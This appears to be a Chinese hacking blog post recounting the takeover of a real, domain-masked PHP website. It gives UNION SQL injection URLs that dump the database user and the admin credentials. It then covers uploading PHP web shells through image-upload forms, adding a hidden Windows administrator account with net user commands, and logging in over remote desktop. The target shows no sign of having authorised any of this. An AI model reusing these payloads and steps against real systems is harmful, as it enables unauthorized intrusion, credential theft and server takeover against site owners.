实战PHP网站系统权限

• 权限
• 系统
• 网站
• 实战
•  
• 得到
• 于是
• 执行
• 用户

错误提示中报了网站的路径，如果我们有相应的权限和信息，就可以直接利用into outfile得到webshell了。通过测试。发现该网站存在注入漏洞，利用order by语句迅速得到改表的字段数目是3(不是所有的都支持ORDER BY语句)，于是提交http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,2,3，得到的结果如图

2的位置可以利用，

于是提交

http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,user(),3

http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,database(),3

得到了用户名和数据名(user()和database()是MYSQL的内置函数)，如图

MYSQL用户名

                       #p#副标题#e#由于2是日期，所以利用load_file的时候错误(可能是长度超范围了吧),转移思路，打算进后台拿shell。通过拆解表明得到user为管理员的表，接着拆解列名，得到是password和 username，于是提交

http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,password,3%20from%20user

http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,username,3%20from%20user

得到了用户名和密码，顺利进入后台。如图：

后台有数据库备份功能，于是在新闻管理的地方上传了一个jpg后缀的小马,然后来到数据库备分的地方，但是不知道为什么。显示不正确。

接着WS抓包，得到备份往址，接着查看网页源文件，想通过自己写提交表单来备份数据，但是却查看不了源文件。无法得到表单名称，此路已死，得寻它路了。于是在后台乱逛，看到在友情链接处也能上传图片，试试上传PHP文件，竟然成功，遂将PHP大马送上(以前也碰到过这样的情况，不知道他们程序员是怎么想的)得到WEBSHELL

                               #p#副标题#e#接着目标转站系统权限了。通过目录浏览，发现此WEBSHELL权限很高(几乎全部是777权限)，对WINDOWS目录有写的权限，自然而然的想到了MYSQL提权。但是由于我手中MYSQL用户不是ROOT，得找到ROOT的密码不可(我开始试过了用我手中的用户，发现不能释放UDF.DLL)。在C:\WINDOWS里面没有my.ini，其他地方也找不到ROOT密码。静心想想，由于权限较大，很有可能有直接执行命令的权限，苦于我着WEBSHELL没有这个功能。于是浏览其他网站目录，想找到ASPX的网站，利用ASPX提权(手中有ASPX提权好马 -- !)。但是没找到,服务器上全是PHP的。于是网上找了个英文的SHELL，里面有执行命令行程序的功能。由于没有回显，于是执行的命令后面加上>重定向执行结果到文本。执行 net user>log.txt成功。!于是分别执行 cmd.exe /c net user novaa 123456 /add;net localgroup administrators novaa /add ，分别执行成功，如图#p#分页标题#e#

用户添加成功!执行NETSTAT -AN 开了3389

远程连接，到这里，服务器拿下。

今天拿站感受最深的就是公欲善其事,必先利其器件.对于网站检测,不能当太信赖工具,你看了我的这篇文章就知道了(http://hi.baidu.com/novaa/blog/item/2af1a1db6a059463d1164e5d.html).而提权相关的东西,自然都要有全而好的了.